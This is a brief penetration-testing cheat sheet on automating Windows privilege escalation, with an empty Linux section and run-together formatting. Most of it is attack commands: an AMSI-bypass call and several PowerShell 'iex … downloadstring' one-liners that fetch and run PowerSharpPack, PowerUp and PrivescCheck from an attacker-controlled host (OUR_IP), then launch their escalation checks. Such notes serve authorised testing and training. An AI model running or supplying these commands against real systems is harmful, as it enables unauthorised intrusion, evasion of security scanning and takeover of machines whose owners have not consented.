Automation Privilege Escalation Scripts
1) Windows
Bypass-4MSIiex(new-object net.webclient).downloadstring('http://OUR_IP/PowerSharpPack.ps1')PowerSharpPack -winPEASPowerSharpUp -SharpUpAlternate script: PowerUp
iex(new-object net.webclient).downloadstring('http://OUR_IP/PowerUp.ps1')Invoke-AllChecksAlternate Script: PrivescCheck
iex(new-object net.webclient).downloadstring('http://OUR_IP/PrivescCheck.ps1')Invoke-PrivescCheck -ExtendedAlternate Script: JAWS Enum
2) Linux
Last updated